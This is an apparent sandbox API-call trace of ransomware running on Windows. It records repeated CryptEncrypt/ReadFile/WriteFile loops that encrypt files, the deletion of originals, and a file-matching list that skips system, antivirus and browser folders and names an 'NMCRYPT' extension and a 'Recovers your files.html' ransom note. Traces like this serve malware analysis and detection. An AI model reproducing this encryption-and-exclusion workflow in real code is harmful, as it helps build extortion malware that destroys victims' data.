1 [0145.318] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.318] GetLastError () returned 0x0 [0145.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.318] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.318] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.318] GetLastError () returned 0x0 [0145.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.318] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.318] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.318] GetLastError () returned 0x0 [0145.318] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.318] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.319] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.319] GetLastError () returned 0x0 [0145.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.319] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.319] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.319] GetLastError () returned 0x0 [0145.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.319] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.319] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.319] GetLastError () returned 0x0 [0145.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.319] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.319] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.319] GetLastError () returned 0x0 [0145.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.319] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.319] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.319] GetLastError () returned 0x0 [0145.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.319] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.319] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.319] GetLastError () returned 0x0 [0145.319] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.319] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0145.319] CryptEncrypt (in: hKey=0x9ad7b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0145.319] GetLastError () returned 0x0 [0145.320] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0145.639] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 1 [0145.639] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat")) returned 0 [0145.639] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" [0145.640] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0145.640] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXABBE.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxabbe.tmp")) returned 0xabbe [0145.640] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXABBE.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxabbe.tmp"), dwFlags=0x1) returned 0 [0145.640] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXABBE.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxabbe.tmp")) returned 1 [0145.640] CryptDestroyKey (hKey=0x9ad7b8) returned 1 [0145.641] wcslen (_String="OK") returned 0x2 [0145.641] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0145.641] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0145.641] CryptDestroyKey (hKey=0x9ad738) returned 1 [0145.641] CryptDestroyHash (hHash=0x9ad278) returned 1 [0145.641] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0145.641] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0145.641] PathMatchSpecW (pszFile="InkDiv.dll", pszSpec="*NMCRYPT") returned 0 [0145.641] PathMatchSpecW (pszFile="InkDiv.dll", pszSpec="*Recovers your files.html") returned 0 [0145.641] PathMatchSpecW (pszFile="InkDiv.dll", pszSpec="*.exe") returned 0 [0145.641] PathMatchSpecW (pszFile="InkDiv.dll", pszSpec="*.dll") returned 1 [0145.641] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0145.641] PathMatchSpecW (pszFile="InkObj.dll", pszSpec="*NMCRYPT") returned 0 [0145.641] PathMatchSpecW (pszFile="InkObj.dll", pszSpec="*Recovers your files.html") returned 0 [0145.641] PathMatchSpecW (pszFile="InkObj.dll", pszSpec="*.exe") returned 0 [0145.641] PathMatchSpecW (pszFile="InkObj.dll", pszSpec="*.dll") returned 1 [0145.641] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0145.641] PathMatchSpecW (pszFile="InputPersonalization.exe", pszSpec="*NMCRYPT") returned 0 [0145.641] PathMatchSpecW (pszFile="InputPersonalization.exe", pszSpec="*Recovers your files.html") returned 0 [0145.641] PathMatchSpecW (pszFile="InputPersonalization.exe", pszSpec="*.exe") returned 1 [0145.641] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*NMCRYPT") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*Recovers your files.html") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*.exe") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*.dll") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*.lnk") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*.bat") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*.ini") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*.msi") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*.scf") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*pagefile.sys*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*NTUSER.DAT*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*AppData*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*\\winrar\\*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*\\java\\*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*\\windows\\*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*\\ESET\\*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*\\AVG\\*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*\\AVIRA\\*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*Atheros*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*Realtek*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*bootmgr*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*boot*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*boot*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*CONFIG.SYS*") returned 0 [0145.641] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*IO.SYS*") returned 0 [0145.642] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*MSDOS.SYS*") returned 0 [0145.642] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*NTDETECT.COM*") returned 0 [0145.642] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*ntldr*") returned 0 [0145.642] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*chrome*") returned 0 [0145.642] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*opera*") returned 0 [0145.642] PathMatchSpecW (pszFile="ipsar.xml", pszSpec="*firefox*") returned 0 [0145.642] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsar.xml", pszSpec="*") returned 1 [0145.642] strlen (_Str="NMoreira") returned 0x8 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.642] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.643] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0145.644] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 